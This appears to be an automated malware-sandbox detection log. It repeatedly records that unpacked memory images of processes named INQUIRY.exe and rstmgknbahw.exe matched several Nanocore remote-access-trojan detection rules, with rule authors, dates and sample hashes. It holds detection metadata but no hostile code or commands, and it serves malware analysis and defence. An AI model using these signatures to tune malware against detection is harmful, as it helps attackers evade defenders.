Source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.rstmgknbahw.exe.3950e14.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.rstmgknbahw.exe.3950e14.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
